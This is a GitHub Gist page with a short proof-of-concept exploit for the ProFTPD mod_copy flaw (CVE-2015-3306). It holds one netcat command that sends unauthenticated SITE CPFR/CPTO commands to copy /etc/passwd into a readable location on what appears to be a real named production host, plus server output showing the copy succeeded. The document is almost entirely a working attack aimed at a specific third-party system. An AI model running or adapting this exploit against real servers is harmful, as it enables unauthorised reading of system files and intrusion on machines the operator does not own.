Last active
October 30, 2016 18:30
-
-
Save toufik-airane/e13dc2b15d64cac9cd52 to your computer and use it in GitHub Desktop.
CVE-2015-3306
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# ProFTPD mod_copy Information Disclosure CVE-2015-3306 | |
echo -e "SITE CPFR /etc/passwd\r\nSITE CPTO /tmp/passwd.tmp\r\nQUIT\r\n" | netcat cpc-prod11.canardpc.com 21 | |
~> INPUT | |
#SITE CPFR /etc/passwd | |
#SITE CPTO /var/www/passwd.tmp | |
#QUIT | |
~> OUTPUT | |
#220 ProFTPD 1.3.4a Server (Debian) | |
#350 File or directory exists, ready for destination name | |
#250 Copy successful | |
#221 Goodbye. :) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment